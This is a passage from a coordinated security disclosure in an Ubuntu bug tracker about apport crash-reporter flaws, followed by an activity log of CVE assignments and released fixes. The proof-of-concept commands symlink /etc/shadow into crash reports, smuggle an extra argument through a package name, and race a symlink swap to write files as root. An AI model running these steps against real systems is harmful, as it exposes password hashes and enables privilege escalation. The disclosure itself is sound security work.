on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.
With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if they are considered to be part of the threat model, but nonetheless will be included in this report. Further, if the issues regarding package hooks should be reported in the corresponding packages' bug tracker, please let me know.
## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path.
```Python
def add_info(report, ui=None):
if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
# attach hs_err_<pid>.pid file
cwd = report['ProcCwd']
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
pid = pid_line.groups()[0]
path = "%s/hs_err_pid%s.log" % (cwd, pid)
# make sure if exists
if os.path.exists(path):
content = read_file(path)
# truncate if bigger than 100 KB
# see LP: #1696814
max_length = 100*1024
if sys.getsizeof(content) < max_length:
report['HotspotError'] = content
report['Tags'] += ' openjdk-hs-err'
else:
report['HotspotError'] = content[:max_length] + \
"\n[truncated by openjdk-11 apport hook]" + \
"\n[max log size is %s, file size was %s]" % \
(si_units(max_length), si_units(sys.getsizeof(content)))
report['Tags'] += ' openjdk-hs-err'
```
By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the function includes an arbitrary file by following a potential symbolic link `/home/user/hs_err_pid0.log`.
### PoC
```
$ sudo apt install openjdk-14-jdk
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 1
$ ln -s /etc/shadow /home/user/hs_err_pid0.log
$ pid=$'\t0';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
$ grep -A3 root: /var/crash/poc.crash
root:!:18393:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
```
## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
The root cause of this issue stems from the fact, that a potentially
user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report:
Note: Requires `fs.protected_symlinks=0`
```Python
def attach_3d_info(report, ui=None):
...
# Compiz internal state if compiz crashed
if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
compiz_pid = pid_line.groups()[0]
compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")
```
### PoC
```
$ sudo sysctl fs.protected_symlinks=0
fs.protected_symlinks = 0
$ ln -s /etc/shadow /tmp/compiz_internal_state0
$ cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
ProcStatus:
Pid:
EOF
$ grep -A3 compiz_internal poc.crash
compiz_internal_states:
root:!:18686:0:99999:7:::
daemon:*:18474:0:99999:7:::
bin:*:18474:0:99999:7:::
```
## Issue 3: Spoof modified config files via argument injection (Info)
The `get_modified_conffiles()` function allows to spoof modified configuration files by a controlled package name:
```Python
def get_modified_conffiles(self, package):
...
dpkg = subprocess.Popen(['dpkg-query', '-W', '--showformat=${Conffiles}',
package], stdout=subprocess.PIPE)
```
By supplying a `package` name such as
`--showformat='${Conffiles;6}shadow 1\n'` it is possible to manipulate dpkg-query's output and therefore to include the `shadow` file in the resulting crash report.
Please note however that this function is seemingly only called in the `attach_conffiles()` function, which subsequently requires a UI response
of the user to finally include the file in the crash report.
### PoC
```
$ dpkg-query -W --showformat='${Conffiles}' --showformat='${Conffiles;6}shadow 1\n' | head -n2
/etc/shadow 1
shadow 1
```
## Issue 4: Arbitrary file write in whoopsie-upload-all (Info)
After adding additional information to the crash file, `whoopsie-upload-all` does not check if the crash file was replaced by a symbolic link before writing the extended report back into the file. Thus, replacing the crash file with a symbolic link allows to write into arbitrary files using `whoopsie-upload-all`'s elevated privileges. By using a program's lax configuration parsing (e.g. `logrotate`), this might lead to code execution.
Note: Requires `fs.protected_symlinks=0`
```Python
def process_report(report):
'''Collect information for a report and mark for whoopsie upload
...
# write updated report, we use os.open and os.fdopen as
# /proc/sys/fs/protected_regular is set to 1 (LP: #1848064)
fd = os.open(report, os.O_WRONLY | os.O_APPEND)
with os.fdopen(fd, 'wb') as f:
os.chmod(report, 0)
r.write(f, only_new=True)
os.chmod(report, 0o640)
```
### PoC
```
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 0
$ cat ex.sh
TARGET="/JRN"
while :; do
FN="/var/crash/$RANDOM.poc.crash"
pid=$'\t0';cat << EOF > $FN
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
while :; do
if ps aux|grep -q "[w]hoopsie-upload-all";then break; fi
done
sleep 0.3
rm -f $FN
ln -s $TARGET $FN
if [ -s /JRN ]; then echo DONE.; break; fi
done
$ sudo touch /JRN; ls -l /JRN # simulating file in e.g. /etc/logrotate.d/
-rw-r--r-- 1 root root 0 M�r 3 14:15 /JRN
$ bash ex.sh
DONE.
$ ls -l /JRN; sudo head -n3 /JRN
-rw-r----- 1 root root 105028 M�r 3 14:16 /JRN
ApportVersion: 2.20.11-0ubuntu27.16
Architecture: amd64
CasperMD5CheckResult: skip
```
# Credits
Please credit maik@secfault-security.com (@fktio) if the issues are considered valid. Further, please coordinate the patch release date with us, in case we consider publishing a short article about these issues.
Best regards,
maik |
|
2021-05-08 19:34:38 |
mal |
bug task added |
|
openjdk-lts (Ubuntu) |
|
2021-05-08 20:01:03 |
Marc Deslauriers |
affects |
apport |
apport (Ubuntu) |
|
2021-05-10 22:44:12 |
Seth Arnold |
cve linked |
|
2021-32547 |
|
2021-05-10 22:44:12 |
Seth Arnold |
cve linked |
|
2021-32548 |
|
2021-05-10 22:44:12 |
Seth Arnold |
cve linked |
|
2021-32549 |
|
2021-05-10 22:44:12 |
Seth Arnold |
cve linked |
|
2021-32550 |
|
2021-05-10 22:44:12 |
Seth Arnold |
cve linked |
|
2021-32551 |
|
2021-05-10 22:44:12 |
Seth Arnold |
cve linked |
|
2021-32552 |
|
2021-05-10 22:44:12 |
Seth Arnold |
cve linked |
|
2021-32553 |
|
2021-05-10 22:44:12 |
Seth Arnold |
cve linked |
|
2021-32554 |
|
2021-05-10 22:44:12 |
Seth Arnold |
cve linked |
|
2021-32555 |
|
2021-05-10 22:44:12 |
Seth Arnold |
cve linked |
|
2021-32556 |
|
2021-05-10 22:44:12 |
Seth Arnold |
cve linked |
|
2021-32557 |
|
2021-05-13 16:06:32 |
Marc Deslauriers |
bug |
|
|
added subscriber Brian Murray |
2021-05-13 16:06:44 |
Marc Deslauriers |
nominated for series |
|
Ubuntu Impish |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
bug task added |
|
apport (Ubuntu Impish) |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
bug task added |
|
openjdk-lts (Ubuntu Impish) |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
nominated for series |
|
Ubuntu Focal |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
bug task added |
|
apport (Ubuntu Focal) |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
bug task added |
|
openjdk-lts (Ubuntu Focal) |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
nominated for series |
|
Ubuntu Groovy |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
bug task added |
|
apport (Ubuntu Groovy) |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
bug task added |
|
openjdk-lts (Ubuntu Groovy) |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
nominated for series |
|
Ubuntu Hirsute |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
bug task added |
|
apport (Ubuntu Hirsute) |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
bug task added |
|
openjdk-lts (Ubuntu Hirsute) |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
nominated for series |
|
Ubuntu Bionic |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
bug task added |
|
apport (Ubuntu Bionic) |
|
2021-05-13 16:06:44 |
Marc Deslauriers |
bug task added |
|
openjdk-lts (Ubuntu Bionic) |
|
2021-05-13 16:07:18 |
Marc Deslauriers |
attachment added |
|
proposed hirsute debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497134/+files/pam_1.3.1-5ubuntu6.21.04.1.debdiff |
|
2021-05-13 16:07:43 |
Marc Deslauriers |
attachment added |
|
proposed groovy debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497135/+files/pam_1.3.1-5ubuntu6.20.10.1.debdiff |
|
2021-05-13 16:08:12 |
Marc Deslauriers |
attachment added |
|
proposed focal debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497136/+files/pam_1.3.1-5ubuntu4.2.debdiff |
|
2021-05-13 16:08:41 |
Marc Deslauriers |
attachment added |
|
proposed bionic debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497137/+files/pam_1.1.8-3.6ubuntu2.18.04.3.debdiff |
|
2021-05-13 16:42:28 |
Marc Deslauriers |
attachment removed |
proposed hirsute debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497134/+files/pam_1.3.1-5ubuntu6.21.04.1.debdiff |
|
|
2021-05-13 16:42:41 |
Marc Deslauriers |
attachment removed |
proposed groovy debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497135/+files/pam_1.3.1-5ubuntu6.20.10.1.debdiff |
|
|
2021-05-13 16:42:52 |
Marc Deslauriers |
attachment removed |
proposed bionic debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497137/+files/pam_1.1.8-3.6ubuntu2.18.04.3.debdiff |
|
|
2021-05-13 16:43:03 |
Marc Deslauriers |
attachment removed |
proposed focal debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497136/+files/pam_1.3.1-5ubuntu4.2.debdiff |
|
|
2021-05-13 16:43:41 |
Marc Deslauriers |
attachment added |
|
proposed hirsute debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497170/+files/apport_2.20.11-0ubuntu65.1.debdiff |
|
2021-05-13 16:44:02 |
Marc Deslauriers |
attachment added |
|
proposed groovy debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497171/+files/apport_2.20.11-0ubuntu50.7.debdiff |
|
2021-05-13 16:44:23 |
Marc Deslauriers |
attachment added |
|
proposed focal debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497172/+files/apport_2.20.11-0ubuntu27.18.debdiff |
|
2021-05-13 16:44:42 |
Marc Deslauriers |
attachment added |
|
proposed bionic debdiff https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1917904/+attachment/5497173/+files/apport_2.20.9-0ubuntu7.24.debdiff |
|
2021-05-25 16:42:41 |
Marc Deslauriers |
bug task deleted |
openjdk-lts (Ubuntu) |
|
|
2021-05-25 16:44:21 |
Launchpad Janitor |
apport (Ubuntu Hirsute): status |
New |
Fix Released |
|
2021-05-25 16:44:24 |
Launchpad Janitor |
apport (Ubuntu Bionic): status |
New |
Fix Released |
|
2021-05-25 16:45:40 |
Launchpad Janitor |
apport (Ubuntu Groovy): status |
New |
Fix Released |
|
2021-05-25 16:45:41 |
Launchpad Janitor |
apport (Ubuntu Focal): status |
New |
Fix Released |
|
2021-05-25 19:31:31 |
Marc Deslauriers |
information type |
Private Security |
Public Security |
|
2021-05-25 19:50:44 |
Marc Deslauriers |
information type |
Public Security |
Private Security |
|
2021-05-25 19:55:47 |
Marc Deslauriers |
removed subscriber Brian Murray |
|
|
|
2021-05-26 00:45:21 |
Launchpad Janitor |
apport (Ubuntu Impish): status |
New |
Fix Released |
|
2021-05-27 18:41:53 |
Launchpad Janitor |
branch linked |
|
lp:~ubuntu-core-dev/ubuntu/impish/apport/ubuntu |
|
2021-06-12 00:47:53 |
Seth Arnold |
information type |
Private Security |
Public Security |
|
2021-06-14 13:49:40 |
SatoshiNakamoto |
branch unlinked |
lp:~ubuntu-core-dev/ubuntu/impish/apport/ubuntu |
|
|
2021-06-19 21:59:37 |
SatoshiNakamoto |
apport (Ubuntu Bionic): assignee |
|
SatoshiNakamoto (evansanita713) |
|
2021-06-19 22:15:54 |
Marc Deslauriers |
apport (Ubuntu Bionic): assignee |
SatoshiNakamoto (evansanita713) |
|
|
2021-06-19 22:28:07 |
SatoshiNakamoto |
apport (Ubuntu Bionic): assignee |
|
SatoshiNakamoto (evansanita713) |
|
2021-06-19 22:28:25 |
SatoshiNakamoto |
apport (Ubuntu Focal): assignee |
|
SatoshiNakamoto (evansanita713) |
|
2021-06-19 22:28:38 |
SatoshiNakamoto |
apport (Ubuntu Groovy): assignee |
|
SatoshiNakamoto (evansanita713) |
|
2021-06-19 22:28:57 |
SatoshiNakamoto |
apport (Ubuntu Hirsute): assignee |
|
SatoshiNakamoto (evansanita713) |
|
2021-06-19 22:29:11 |
SatoshiNakamoto |
apport (Ubuntu Impish): assignee |
|
SatoshiNakamoto (evansanita713) |
|
2021-06-19 22:29:26 |
SatoshiNakamoto |
information type |
Public Security |
Private Security |
|
2021-06-19 23:06:56 |
Marc Deslauriers |
apport (Ubuntu Bionic): assignee |
SatoshiNakamoto (evansanita713) |
|
|
2021-06-19 23:07:04 |
Marc Deslauriers |
apport (Ubuntu Focal): assignee |
SatoshiNakamoto (evansanita713) |
|
|
2021-06-19 23:07:16 |
Marc Deslauriers |
apport (Ubuntu Groovy): assignee |
SatoshiNakamoto (evansanita713) |
|
|
2021-06-19 23:07:23 |
Marc Deslauriers |
apport (Ubuntu Hirsute): assignee |
SatoshiNakamoto (evansanita713) |
|
|
2021-06-19 23:07:32 |
Marc Deslauriers |
apport (Ubuntu Impish): assignee |
SatoshiNakamoto (evansanita713) |
|
|
2021-06-19 23:07:38 |
Marc Deslauriers |
information type |
Private Security |
Public Security |
|
2021-06-30 01:14:56 |
SatoshiNakamoto |
apport (Ubuntu Impish): assignee |
|
SatoshiNakamoto (evansanita713) |
|
2021-06-30 01:42:25 |
Marc Deslauriers |
apport (Ubuntu Impish): assignee |
SatoshiNakamoto (evansanita713) |
|
|
2022-06-27 10:29:00 |
Benjamin Drung |
bug task added |
|
apport |
|
2022-06-27 10:29:28 |
Benjamin Drung |
apport: importance |
Undecided |
Critical |
|
2022-06-27 10:29:28 |
Benjamin Drung |
apport: status |
New |
Fix Released |
|
2022-06-27 10:29:28 |
Benjamin Drung |
apport: milestone |
|
2.21.0 |
|